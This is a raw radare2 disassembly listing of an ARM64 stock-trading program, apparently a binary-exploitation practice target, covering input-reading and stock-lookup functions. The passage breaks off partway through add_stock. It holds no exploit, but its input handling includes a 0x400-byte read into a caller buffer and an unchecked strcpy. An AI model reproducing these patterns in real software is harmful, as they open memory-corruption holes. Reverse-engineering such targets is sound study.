╎│ 0x000019f8 1f000071 cmp w0, 0 │ ┌───< 0x000019fc c0020054 b.eq 0x1a54 │ │╎│ 0x00001a00 e00780b9 ldrsw x0, [format] │ │╎│ 0x00001a04 01e47ad3 lsl x1, x0, 6 │ │╎│ 0x00001a08 800000b0 adrp x0, 0x12000 │ │╎│ 0x00001a0c 00602091 add x0, x0, 0x818 ; 0x12818 │ │╎│ ; obj.stocks │ │╎│ 0x00001a10 2200008b add x2, x1, x0 ; 0x12818 │ │╎│ ; obj.stocks │ │╎│ 0x00001a14 800000b0 adrp x0, 0x12000 │ │╎│ 0x00001a18 01602091 add x1, x0, 0x818 ; 0x12818 │ │╎│ ; obj.stocks │ │╎│ 0x00001a1c e00780b9 ldrsw x0, [format] │ │╎│ 0x00001a20 00e47ad3 lsl x0, x0, 6 │ 
│╎│ 0x00001a24 2000008b add x0, x1, x0 ; 0x12818 │ │╎│ ; obj.stocks │ │╎│ 0x00001a28 033840b9 ldr w3, [x0, 0x38] │ │╎│ 0x00001a2c 800000b0 adrp x0, 0x12000 │ │╎│ 0x00001a30 01602091 add x1, x0, 0x818 ; 0x12818 │ │╎│ ; obj.stocks │ │╎│ ; DATA XREF from str.Quantity: @ +0x4(r) │ │╎│ 0x00001a34 e00780b9 ldrsw x0, [format] │ │╎│ 0x00001a38 00e47ad3 lsl x0, x0, 6 │ │╎│ 0x00001a3c 2000008b add x0, x1, x0 ; 0x12818 │ │╎│ ; obj.stocks │ │╎│ 0x00001a40 001840fd ldr d0, [x0, 0x30] │ │╎│ 0x00001a44 e10740b9 ldr w1, [format] │ │╎│ 0x00001a48 000000b0 adrp x0, str.__Market__ ; 0x2000 │ │╎│ 0x00001a4c 00400091 add x0, x0, 0x10 ; 0x2010 ; "\t%d. %s: %d shares at $%.2f\n" ; const char *format │ │╎│ 0x00001a50 14fcff97 bl sym.imp.printf ; int printf(const char *format) │ │╎│ ; CODE XREF from sym.consult_market @ 0x19fc(x) │ └───> 0x00001a54 e00740b9 ldr w0, [format] │ ╎│ 0x00001a58 00040011 add w0, w0, 1 │ ╎│ 0x00001a5c e00700b9 str w0, [format] │ ╎│ ; CODE XREF from sym.consult_market @ 0x19dc(x) │ ╎└─> 0x00001a60 e00740b9 ldr w0, [format] │ ╎ 0x00001a64 1f8c0171 cmp w0, 0x63 ; 'c' │ └──< 0x00001a68 cdfbff54 b.le 0x19e0 │ 0x00001a6c 000000b0 adrp x0, str.__Market__ ; 0x2000 │ 0x00001a70 00c00091 add x0, x0, 0x30 ; const char *s │ 0x00001a74 f7fbff97 bl sym.imp.puts ; int puts(const char *s) │ 0x00001a78 1f2003d5 nop │ 0x00001a7c 800000b0 adrp x0, 0x12000 │ 0x00001a80 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001a84 e20740f9 ldr x2, [var_8h] │ 0x00001a88 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001a8c 420001eb subs x2, x2, x1 │ 0x00001a90 010080d2 mov x1, 0 │ ┌─< 0x00001a94 40000054 b.eq 0x1a9c │ │ 0x00001a98 defbff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.consult_market @ 0x1a94(x) │ └─> 0x00001a9c fd7b41a9 ldp x29, x30, [var_10h] │ 0x00001aa0 ff830091 add sp, sp, 0x20 ; 0x178000 └ 0x00001aa4 c0035fd6 ret ; CALL XREF from sym.read_int @ 0xcf4(x) ; CALL XREF from 
sym.get_symbol_quantity @ 0xd70(x) ; CALL XREF from sym.check_stock_price @ 0x17e8(x) ┌ 248: sym.read_until (int64_t arg1, int64_t arg2, int64_t arg_40h); │ `- args(x0, x1) vars(7:sp[0x8..0x40]) │ 0x00000bd4 ff0301d1 sub sp, sp, 0x40 │ 0x00000bd8 fd7b03a9 stp x29, x30, [var_30h] │ 0x00000bdc fdc30091 add x29, sp, 0x30 │ 0x00000be0 e00700f9 str x0, [var_8h] ; arg1 │ 0x00000be4 e10300f9 str x1, [sp] ; arg2 │ 0x00000be8 800000d0 adrp x0, 0x12000 │ 0x00000bec 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000bf0 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000bf4 e11700f9 str x1, [var_28h] │ 0x00000bf8 010080d2 mov x1, 0 │ 0x00000bfc ff1300f9 str xzr, [var_20h] │ 0x00000c00 ff1300f9 str xzr, [var_20h] │ ┌─< 0x00000c04 1b000014 b 0xc70 │ │ ; CODE XREF from sym.read_until @ 0xc80(x) │ ┌──> 0x00000c08 ff7f0039 strb wzr, [fildes] │ ╎│ 0x00000c0c e07f0091 add x0, sp, 0x1f ; int fildes │ ╎│ 0x00000c10 220080d2 mov x2, 1 ; size_t nbyte │ ╎│ 0x00000c14 e10300aa mov x1, x0 ; void *buf │ ╎│ 0x00000c18 00008052 mov w0, 0 │ ╎│ 0x00000c1c 99ffff97 bl sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte) │ ╎│ 0x00000c20 e07f4039 ldrb w0, [fildes] │ ╎│ 0x00000c24 1f340071 cmp w0, 0xd │ ┌───< 0x00000c28 80000054 b.eq 0xc38 │ │╎│ 0x00000c2c e07f4039 ldrb w0, [fildes] │ │╎│ 0x00000c30 1f280071 cmp w0, 0xa │ ┌────< 0x00000c34 e1000054 b.ne 0xc50 │ ││╎│ ; CODE XREF from sym.read_until @ 0xc28(x) │ │└───> 0x00000c38 e10740f9 ldr x1, [var_8h] │ │ ╎│ 0x00000c3c e01340f9 ldr x0, [var_20h] │ │ ╎│ 0x00000c40 2000008b add x0, x1, x0 │ │ ╎│ 0x00000c44 e17f4039 ldrb w1, [fildes] │ │ ╎│ 0x00000c48 01000039 strb w1, [x0] │ │┌───< 0x00000c4c 0e000014 b 0xc84 │ ││╎│ ; CODE XREF from sym.read_until @ 0xc34(x) │ └────> 0x00000c50 e10740f9 ldr x1, [var_8h] │ │╎│ 0x00000c54 e01340f9 ldr x0, [var_20h] │ │╎│ 0x00000c58 2000008b add x0, x1, x0 │ │╎│ 0x00000c5c e17f4039 ldrb w1, [fildes] │ │╎│ 0x00000c60 01000039 strb w1, [x0] │ │╎│ 
0x00000c64 e01340f9 ldr x0, [var_20h] │ │╎│ 0x00000c68 00040091 add x0, x0, 1 │ │╎│ 0x00000c6c e01300f9 str x0, [var_20h] │ │╎│ ; CODE XREF from sym.read_until @ 0xc04(x) │ │╎└─> 0x00000c70 e00340f9 ldr x0, [sp] │ │╎ 0x00000c74 000400d1 sub x0, x0, 1 │ │╎ 0x00000c78 e11340f9 ldr x1, [var_20h] │ │╎ 0x00000c7c 3f0000eb cmp x1, x0 │ │└──< 0x00000c80 43fcff54 b.lo 0xc08 │ │ ; CODE XREF from sym.read_until @ 0xc4c(x) │ └───> 0x00000c84 e10740f9 ldr x1, [var_8h] │ 0x00000c88 e01340f9 ldr x0, [var_20h] │ 0x00000c8c 2000008b add x0, x1, x0 │ 0x00000c90 1f000039 strb wzr, [x0] │ 0x00000c94 e01340f9 ldr x0, [var_20h] │ 0x00000c98 e103002a mov w1, w0 │ 0x00000c9c 800000d0 adrp x0, 0x12000 │ 0x00000ca0 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000ca4 e31740f9 ldr x3, [var_28h] │ 0x00000ca8 020040f9 ldr x2, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000cac 630002eb subs x3, x3, x2 │ 0x00000cb0 020080d2 mov x2, 0 │ ┌─< 0x00000cb4 40000054 b.eq 0xcbc │ │ 0x00000cb8 56ffff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.read_until @ 0xcb4(x) │ └─> 0x00000cbc e003012a mov w0, w1 │ 0x00000cc0 fd7b43a9 ldp x29, x30, [var_30h] │ 0x00000cc4 ff030191 add sp, sp, 0x40 ; 0x178000 └ 0x00000cc8 c0035fd6 ret ; CALL XREF from main @ 0x1db8(x) ┌ 232: sym.check_stock_price (int64_t arg_60h); │ `- args() vars(11:sp[0x8..0x54]) │ 0x000017a8 ff8301d1 sub sp, sp, 0x60 │ 0x000017ac fd7b05a9 stp x29, x30, [var_50h] │ 0x000017b0 fd430191 add x29, sp, 0x50 │ 0x000017b4 800000b0 adrp x0, 0x12000 │ 0x000017b8 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000017bc 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000017c0 e12700f9 str x1, [var_48h] │ 0x000017c4 010080d2 mov x1, 0 │ 0x000017c8 ffff01a9 stp xzr, xzr, [format] │ 0x000017cc ffff02a9 stp xzr, xzr, [var_28h] │ 0x000017d0 ffff03a9 stp xzr, xzr, [var_38h] │ 0x000017d4 00000090 adrp x0, 0x1000 │ 0x000017d8 00803a91 
add x0, x0, 0xea0 ; 0x1ea0 ; "Symbol:" ; const char *format │ 0x000017dc b1fcff97 bl sym.imp.printf ; int printf(const char *format) │ 0x000017e0 e0630091 add x0, sp, 0x18 ; int64_t arg1 │ 0x000017e4 010680d2 mov x1, 0x30 ; '0' ; int64_t arg2 │ 0x000017e8 fbfcff97 bl sym.read_until │ 0x000017ec ff0b00f9 str xzr, [var_10h] │ 0x000017f0 e0630091 add x0, sp, 0x18 ; int64_t arg1 │ 0x000017f4 eefdff97 bl sym.find_stock │ 0x000017f8 e00f00b9 str w0, [var_ch] │ 0x000017fc e00f40b9 ldr w0, [var_ch] │ 0x00001800 1f040031 cmn w0, 1 │ ┌─< 0x00001804 e0020054 b.eq 0x1860 │ │ 0x00001808 800000b0 adrp x0, 0x12000 │ │ 0x0000180c 01602091 add x1, x0, 0x818 ; 0x12818 │ │ ; obj.stocks │ │ 0x00001810 e00f80b9 ldrsw x0, [var_ch] │ │ 0x00001814 00e47ad3 lsl x0, x0, 6 │ │ 0x00001818 2000008b add x0, x1, x0 ; 0x12818 │ │ ; obj.stocks │ │ 0x0000181c 001840fd ldr d0, [x0, 0x30] │ │ 0x00001820 e00b00fd str d0, [var_10h] │ │ 0x00001824 e10b40fd ldr d1, [var_10h] │ │ 0x00001828 00107e1e fmov d0, -1 │ │ 0x0000182c 2020601e fcmp d1, d0 │ ┌──< 0x00001830 a1000054 b.ne 0x1844 │ ││ 0x00001834 00000090 adrp x0, 0x1000 │ ││ 0x00001838 00603f91 add x0, x0, 0xfd8 ; 0x1fd8 ; "Stock not found." 
; const char *s │ ││ 0x0000183c 85fcff97 bl sym.imp.puts ; int puts(const char *s) │ ┌───< 0x00001840 09000014 b 0x1864 │ │││ ; CODE XREF from sym.check_stock_price @ 0x1830(x) │ │└──> 0x00001844 e0630091 add x0, sp, 0x18 │ │ │ 0x00001848 e00b40fd ldr d0, [var_10h] │ │ │ 0x0000184c e10300aa mov x1, x0 │ │ │ 0x00001850 00000090 adrp x0, 0x1000 │ │ │ 0x00001854 00c03f91 add x0, x0, 0xff0 ; 0x1ff0 ; "%s: %.2f\n" ; const char *format │ │ │ 0x00001858 92fcff97 bl sym.imp.printf ; int printf(const char *format) │ │┌──< 0x0000185c 02000014 b 0x1864 │ │││ ; CODE XREF from sym.check_stock_price @ 0x1804(x) │ ││└─> 0x00001860 1f2003d5 nop │ ││ ; CODE XREFS from sym.check_stock_price @ 0x1840(x), 0x185c(x) │ └└──> 0x00001864 800000b0 adrp x0, 0x12000 │ 0x00001868 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x0000186c e22740f9 ldr x2, [var_48h] │ 0x00001870 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001874 420001eb subs x2, x2, x1 │ 0x00001878 010080d2 mov x1, 0 │ ┌─< 0x0000187c 40000054 b.eq 0x1884 │ │ 0x00001880 64fcff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.check_stock_price @ 0x187c(x) │ └─> 0x00001884 fd7b45a9 ldp x29, x30, [var_50h] │ 0x00001888 ff830191 add sp, sp, 0x60 ; 0x178000 └ 0x0000188c c0035fd6 ret INFO: Propagate noreturn information (aanr) ; CALL XREF from sym.get_symbol_quantity @ 0xd80(x) ; CALL XREFS from sym.short_sell @ 0x1674(x), 0x16e0(x) ; CALL XREF from main @ 0x1cf4(x) ┌ 104: sym.read_int (int64_t arg_a0h); │ `- args() vars(4:sp[0x8..0x98]) │ 0x00000ccc ff8302d1 sub sp, sp, 0xa0 │ 0x00000cd0 fd7b09a9 stp x29, x30, [var_90h] │ 0x00000cd4 fd430291 add x29, sp, 0x90 │ 0x00000cd8 800000d0 adrp x0, 0x12000 │ 0x00000cdc 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000ce0 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000ce4 e14700f9 str x1, [var_88h] │ 0x00000ce8 010080d2 mov x1, 0 │ 0x00000cec 
e0230091 add x0, sp, 8 ; int64_t arg1 │ 0x00000cf0 011080d2 mov x1, 0x80 ; int64_t arg2 │ 0x00000cf4 b8ffff97 bl sym.read_until │ 0x00000cf8 e0230091 add x0, sp, 8 ; const char *str │ 0x00000cfc 39ffff97 bl sym.imp.atoi ; int atoi(const char *str) │ 0x00000d00 e103002a mov w1, w0 │ 0x00000d04 800000d0 adrp x0, 0x12000 │ 0x00000d08 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000d0c e34740f9 ldr x3, [var_88h] │ 0x00000d10 020040f9 ldr x2, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000d14 630002eb subs x3, x3, x2 │ 0x00000d18 020080d2 mov x2, 0 │ ┌─< 0x00000d1c 40000054 b.eq 0xd24 │ │ 0x00000d20 3cffff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.read_int @ 0xd1c(x) │ └─> 0x00000d24 e003012a mov w0, w1 │ 0x00000d28 fd7b49a9 ldp x29, x30, [var_90h] │ 0x00000d2c ff830291 add sp, sp, 0xa0 ; 0x178000 └ 0x00000d30 c0035fd6 ret INFO: Use -AA or aaaa to perform additional experimental analysis INFO: Finding xrefs in noncode sections (e anal.in=io.maps.x; aav) WARN: Skipping aav because base address is zero. 
Use -B 0x800000 or aav0 ; CALL XREF from sym.buy_stock @ 0x11d0(x) ; CALL XREF from sym.sell_stock @ 0x13e4(x) ┌ 140: sym.get_symbol_quantity (int64_t arg1, int64_t arg2, int64_t arg_30h); │ `- args(x0, x1) vars(5:sp[0x8..0x30]) │ 0x00000d34 ffc300d1 sub sp, sp, 0x30 │ 0x00000d38 fd7b02a9 stp x29, x30, [var_20h] │ 0x00000d3c fd830091 add x29, sp, 0x20 │ 0x00000d40 e00700f9 str x0, [var_8h] ; arg1 │ 0x00000d44 e10300f9 str x1, [sp] ; arg2 │ 0x00000d48 800000d0 adrp x0, 0x12000 │ 0x00000d4c 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000d50 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000d54 e10f00f9 str x1, [var_18h] │ 0x00000d58 010080d2 mov x1, 0 │ 0x00000d5c 000000b0 adrp x0, 0x1000 │ 0x00000d60 00803a91 add x0, x0, 0xea0 ; 0x1ea0 ; "Symbol:" ; const char *format │ 0x00000d64 4fffff97 bl sym.imp.printf ; int printf(const char *format) │ 0x00000d68 018080d2 mov x1, 0x400 ; int64_t arg2 │ 0x00000d6c e00740f9 ldr x0, [var_8h] ; int64_t arg1 │ 0x00000d70 99ffff97 bl sym.read_until │ 0x00000d74 000000b0 adrp x0, 0x1000 │ 0x00000d78 00c03a91 add x0, x0, 0xeb0 ; 0x1eb0 ; "Quantity:" ; const char *format │ 0x00000d7c 49ffff97 bl sym.imp.printf ; int printf(const char *format) │ 0x00000d80 d3ffff97 bl sym.read_int │ 0x00000d84 e103002a mov w1, w0 │ 0x00000d88 e00340f9 ldr x0, [sp] │ 0x00000d8c 010000b9 str w1, [x0] │ 0x00000d90 1f2003d5 nop │ 0x00000d94 800000d0 adrp x0, 0x12000 │ 0x00000d98 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000d9c e20f40f9 ldr x2, [var_18h] │ 0x00000da0 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000da4 420001eb subs x2, x2, x1 │ 0x00000da8 010080d2 mov x1, 0 │ ┌─< 0x00000dac 40000054 b.eq 0xdb4 │ │ 0x00000db0 18ffff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.get_symbol_quantity @ 0xdac(x) │ └─> 0x00000db4 fd7b42a9 ldp x29, x30, [var_20h] │ 0x00000db8 ffc30091 add sp, sp, 0x30 ; 
0x178000 └ 0x00000dbc c0035fd6 ret ; CALL XREF from sym.buy_stock @ 0x11d8(x) ; CALL XREF from sym.sell_stock @ 0x1438(x) ; CALL XREF from sym.check_stock_price @ 0x17f4(x) ┌ 264: sym.find_stock (char *arg1, int64_t arg_40h); │ `- args(x0) vars(6:sp[0x10..0x38]) │ 0x00000fac ff0301d1 sub sp, sp, 0x40 │ ; DATA XREF from sym.short_sell @ 0x1728(r) │ 0x00000fb0 fd7b02a9 stp x29, x30, [var_20h] │ 0x00000fb4 fd830091 add x29, sp, 0x20 │ 0x00000fb8 f31b00f9 str x19, [var_30h] │ 0x00000fbc e00700f9 str x0, [s2] ; arg1 │ 0x00000fc0 800000d0 adrp x0, 0x12000 │ 0x00000fc4 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000fc8 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000fcc e10f00f9 str x1, [var_18h] │ 0x00000fd0 010080d2 mov x1, 0 │ 0x00000fd4 e00740f9 ldr x0, [s2] │ ; DATA XREF from sym.check_stock_price @ 0x1838(r) │ 0x00000fd8 00004039 ldrb w0, [x0] │ 0x00000fdc 1f000071 cmp w0, 0 │ ┌─< 0x00000fe0 61000054 b.ne 0xfec │ │ 0x00000fe4 00008012 mov w0, -1 │ ┌──< 0x00000fe8 25000014 b 0x107c │ ││ ; CODE XREF from sym.find_stock @ 0xfe0(x) │ │└─> 0x00000fec ff1700b9 str wzr, [var_14h] │ │ ; DATA XREF from sym.check_stock_price @ 0x1854(r) │ │┌─< 0x00000ff0 1c000014 b 0x1060 │ ││ ; CODE XREF from sym.find_stock @ 0x1074(x) │ ┌───> 0x00000ff4 800000d0 adrp x0, 0x12000 │ ╎││ 0x00000ff8 01602091 add x1, x0, 0x818 ; 0x12818 │ ╎││ ; obj.stocks │ ╎││ 0x00000ffc e01780b9 ldrsw x0, [var_14h] │ ╎││ ; XREFS: DATA 0x00000d5c DATA 0x00000d74 DATA 0x00000e84 │ ╎││ ; XREFS: DATA 0x0000146c DATA 0x00001490 DATA 0x000015d4 │ ╎││ ; XREFS: DATA 0x00001644 DATA 0x00001668 DATA 0x00001688 │ ╎││ ; XREFS: DATA 0x0000169c DATA 0x000016cc DATA 0x00001724 │ ╎││ ; XREFS: DATA 0x000017d4 DATA 0x00001834 DATA 0x00001850 │ ╎││ 0x00001000 00e47ad3 lsl x0, x0, 6 │ ╎││ 0x00001004 2000008b add x0, x1, x0 ; 0x12818 │ ╎││ ; obj.stocks │ ╎││ 0x00001008 00004039 ldrb w0, [x0] ; [0x12818:8]=0 │ ╎││ ; obj.stocks │ ╎││ 0x0000100c 1f000071 cmp w0, 0 │ ┌────< 
0x00001010 00020054 b.eq 0x1050 │ │╎││ 0x00001014 e01780b9 ldrsw x0, [var_14h] │ │╎││ 0x00001018 01e47ad3 lsl x1, x0, 6 │ │╎││ 0x0000101c 800000b0 adrp x0, 0x12000 │ │╎││ 0x00001020 00602091 add x0, x0, 0x818 ; 0x12818 │ │╎││ ; obj.stocks │ │╎││ 0x00001024 3300008b add x19, x1, x0 ; 0x12818 │ │╎││ ; obj.stocks │ │╎││ 0x00001028 e00740f9 ldr x0, [s2] ; const char *s │ │╎││ 0x0000102c 59feff97 bl sym.imp.strlen ; size_t strlen(const char *s) │ │╎││ 0x00001030 e20300aa mov x2, x0 ; size_t n │ │╎││ 0x00001034 e10740f9 ldr x1, [s2] ; const void *s2 │ │╎││ 0x00001038 e00313aa mov x0, x19 ; const void *s1 │ │╎││ 0x0000103c 89feff97 bl sym.imp.memcmp ; int memcmp(const void *s1, const void *s2, size_t n) │ │╎││ 0x00001040 1f000071 cmp w0, 0 │ ┌─────< 0x00001044 81000054 b.ne 0x1054 │ ││╎││ 0x00001048 e01740b9 ldr w0, [var_14h] │ ┌──────< 0x0000104c 0c000014 b 0x107c │ │││╎││ ; CODE XREF from sym.find_stock @ 0x1010(x) │ ││└────> 0x00001050 1f2003d5 nop │ ││ ╎││ ; CODE XREF from sym.find_stock @ 0x1044(x) │ │└─────> 0x00001054 e01740b9 ldr w0, [var_14h] │ │ ╎││ 0x00001058 00040011 add w0, w0, 1 │ │ ╎││ 0x0000105c e01700b9 str w0, [var_14h] │ │ ╎││ ; CODE XREF from sym.find_stock @ 0xff0(x) │ │ ╎│└─> 0x00001060 e11740b9 ldr w1, [var_14h] │ │ ╎│ 0x00001064 a0000090 adrp x0, 0x15000 │ │ ╎│ 0x00001068 00602891 add x0, x0, 0xa18 ; 0x15a18 │ │ ╎│ ; obj.num_stocks │ │ ╎│ 0x0000106c 000040b9 ldr w0, [x0] ; [0x15a18:8]=0 │ │ ╎│ ; obj.num_stocks │ │ ╎│ 0x00001070 3f00006b cmp w1, w0 │ │ └───< 0x00001074 03fcff54 b.lo 0xff4 │ │ │ 0x00001078 00008012 mov w0, -1 │ │ │ ; CODE XREFS from sym.find_stock @ 0xfe8(x), 0x104c(x) │ └───└──> 0x0000107c e103002a mov w1, w0 │ 0x00001080 800000b0 adrp x0, 0x12000 │ 0x00001084 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001088 e30f40f9 ldr x3, [var_18h] │ 0x0000108c 020040f9 ldr x2, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001090 630002eb subs x3, x3, x2 │ 0x00001094 020080d2 mov x2, 0 │ ┌─< 
0x00001098 40000054 b.eq 0x10a0 │ │ 0x0000109c 5dfeff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.find_stock @ 0x1098(x) │ └─> 0x000010a0 e003012a mov w0, w1 │ 0x000010a4 f31b40f9 ldr x19, [var_30h] │ 0x000010a8 fd7b42a9 ldp x29, x30, [var_20h] │ 0x000010ac ff030191 add sp, sp, 0x40 ; 0x178000 └ 0x000010b0 c0035fd6 ret ; XREFS: CALL 0x00001b6c CALL 0x00001b78 CALL 0x00001b84 ; XREFS: CALL 0x00001b90 CALL 0x00001b9c CALL 0x00001ba8 ; XREFS: CALL 0x00001bb4 CALL 0x00001bc0 CALL 0x00001bcc ; XREFS: CALL 0x00001bd8 ┌ 360: sym.add_stock (char *arg1, int64_t arg_40h); │ `- args(x0) vars(6:sp[0x8..0x38]) │ 0x00000e44 ff0301d1 sub sp, sp, 0x40 │ 0x00000e48 fd7b03a9 stp x29, x30, [var_30h] │ 0x00000e4c fdc30091 add x29, sp, 0x30 │ 0x00000e50 e00700f9 str x0, [src] ; arg1 │ 0x00000e54 800000d0 adrp x0, 0x12000 │ 0x00000e58 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000e5c 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00000e60 e11700f9 str x1, [var_28h] │ 0x00000e64 010080d2 mov x1, 0 │ 0x00000e68 ff1300f9 str xzr, [var_20h] │ 0x00000e6c ff1f00b9 str wzr, [var_1ch] │ 0x00000e70 a00000b0 adrp x0, 0x15000 │ 0x00000e74 00602891 add x0, x0, 0xa18 ; 0x15a18 │ ; obj.num_stocks │ 0x00000e78 000040b9 ldr w0, [x0] ; [0x15a18:8]=0 │ ; obj.num_stocks │ ; CODE XREF from section..interp @ +0x10(x) │ 0x00000e7c 1f8c0171 cmp w0, 0x63 ; 'c' │ ┌─< 0x00000e80 a9000054 b.ls 0xe94 │ │ 0x00000e84 000000b0 adrp x0, 0x1000 │ │ 0x00000e88 00003b91 add x0, x0, 0xec0 ; 0x1ec0 ; "Cannot add any more stocks. Stock list is full." 
; const char *s │ │ 0x00000e8c f1feff97 bl sym.imp.puts ; int puts(const char *s) │ ┌──< 0x00000e90 3c000014 b 0xf80 │ ││ ; CODE XREF from sym.add_stock @ 0xe80(x) │ │└─> 0x00000e94 0000c8d2 mov x0, 0x400000000000 │ │ 0x00000e98 e00fe8f2 movk x0, 0x407f, lsl 48 ; '\x7f@' │ │ 0x00000e9c 0100679e fmov d1, x0 │ │ ; DATA XREF from sym.get_symbol_quantity @ 0xd60(r) │ │ ; DATA XREF from sym.check_stock_price @ 0x17d8(r) │ │ 0x00000ea0 2009e8d2 mov x0, 0x4049000000000000 ; int64_t arg_30h │ │ 0x00000ea4 0000679e fmov d0, x0 │ │ 0x00000ea8 c6ffff97 bl sym.drand │ │ 0x00000eac e01300fd str d0, [var_20h] │ │ ; DATA XREF from sym.get_symbol_quantity @ 0xd78(r) │ │ ; DATA XREF from sym.short_sell @ 0x16a0(r) │ │ 0x00000eb0 d4feff97 bl sym.imp.rand ; int rand(void) │ │ 0x00000eb4 a1759152 mov w1, 0x8bad │ │ 0x00000eb8 611bad72 movk w1, 0x68db, lsl 16 │ │ 0x00000ebc 017c219b smull x1, w0, w1 │ │ ; DATA XREF from sym.add_stock @ 0xe88(r) │ │ 0x00000ec0 21fc60d3 lsr x1, x1, 0x20 │ │ 0x00000ec4 227c0c13 asr w2, w1, 0xc │ │ 0x00000ec8 017c1f13 asr w1, w0, 0x1f │ │ 0x00000ecc 4200014b sub w2, w2, w1 │ │ 0x00000ed0 01e28452 mov w1, 0x2710 ; '\x10\'' │ │ 0x00000ed4 417c011b mul w1, w2, w1 │ │ 0x00000ed8 0000014b sub w0, w0, w1 │ │ 0x00000edc e01f00b9 str w0, [var_1ch] │ │ 0x00000ee0 e01f40b9 ldr w0, [var_1ch] │ │ 0x00000ee4 00a00f11 add w0, w0, 0x3e8 │ │ 0x00000ee8 e01f00b9 str w0, [var_1ch] │ │ 0x00000eec a00000b0 adrp x0, 0x15000 │ │ ; DATA XREF from sym.sell_stock @ 0x1470(r) │ │ 0x00000ef0 00602891 add x0, x0, 0xa18 ; 0x15a18 │ │ ; obj.num_stocks │ │ 0x00000ef4 000040b9 ldr w0, [x0] ; [0x15a18:8]=0 │ │ ; obj.num_stocks │ │ 0x00000ef8 e003002a mov w0, w0 │ │ 0x00000efc 01e47ad3 lsl x1, x0, 6 │ │ 0x00000f00 800000d0 adrp x0, 0x12000 │ │ 0x00000f04 00602091 add x0, x0, 0x818 ; 0x12818 │ │ ; obj.stocks │ │ ; DATA XREF from sym.sell_stock @ 0x1494(r) │ │ 0x00000f08 2000008b add x0, x1, x0 ; 0x12818 │ │ ; obj.stocks ; char *dest │ │ 0x00000f0c e10740f9 ldr x1, [src] ; const char *src │ 
│ 0x00000f10 d8feff97 bl sym.imp.strcpy ; char *strcpy(char *dest, const char *src) │ │ 0x00000f14 a00000b0 adrp x0, 0x15000 │ │ 0x00000f18 00602891 add x0, x0, 0xa18 ; 0x15a18 │ │ ; obj.num_stocks │ │ 0x00000f1c 020040b9 ldr w2, [x0] ; [0x15a18:8]=0 │ │ ; obj.num_stocks │ │ ; DATA XREF from sym.short_sell @ 0x15d8(r) │ │ 0x00000f20 800000d0 adrp x0, 0x12000 │ │ 0x00000f24 01602091 add x1, x0, 0x818 ; 0x12818 │ │ ; obj.stocks │ │ 0x00000f28 e003022a mov w0, w2 │ │ 0x00000f2c 00e47ad3 lsl x0, x0, 6 │ │ 0x00000f30 2000008b add x0, x1, x0 ; 0x12818 │ │ ; obj.stocks │ │ 0x00000f34 e01340fd ldr d0, [var_20h] │ │ 0x00000f38 001800fd str d0, [x0, 0x30] │ │ 0x00000f3c a00000b0 adrp x0, 0x15000 │ │ 0x00000f40 00602891 add x0, x0, 0xa18 ; 0x15a18 │ │ ; obj.num_stocks │ │ 0x00000f44 030040b9 ldr w3, [x0] ; [0x15a18:8]=0 │ │ ; obj.num_stocks │ │ 0x00000f48 e11f40b9 ldr w1, [var_1ch] │ │ 0x00000f4c 800000d0 adrp x0, 0x12000 │ │ ; DATA XREF from sym.short_sell @ 0x1648(r) │ │ 0x00000f50 02602091 add x2, x0, 0x818 ; 0x12818 │ │ ; obj.stocks │ │ 0x00000f54 e003032a mov w0, w3 │ │ 0x00000f58 00e47ad3 lsl x0, x0, 6 │ │ 0x00000f5c 4000008b add x0, x2, x0 ; 0x12818 │ │ ; obj.stocks │ │ 0x00000f60 013800b9 str w1, [x0, 0x38] │ │ 0x00000f64 a00000b0 adrp x0, 0x15000 │ │ ; DATA XREF from sym.short_sell 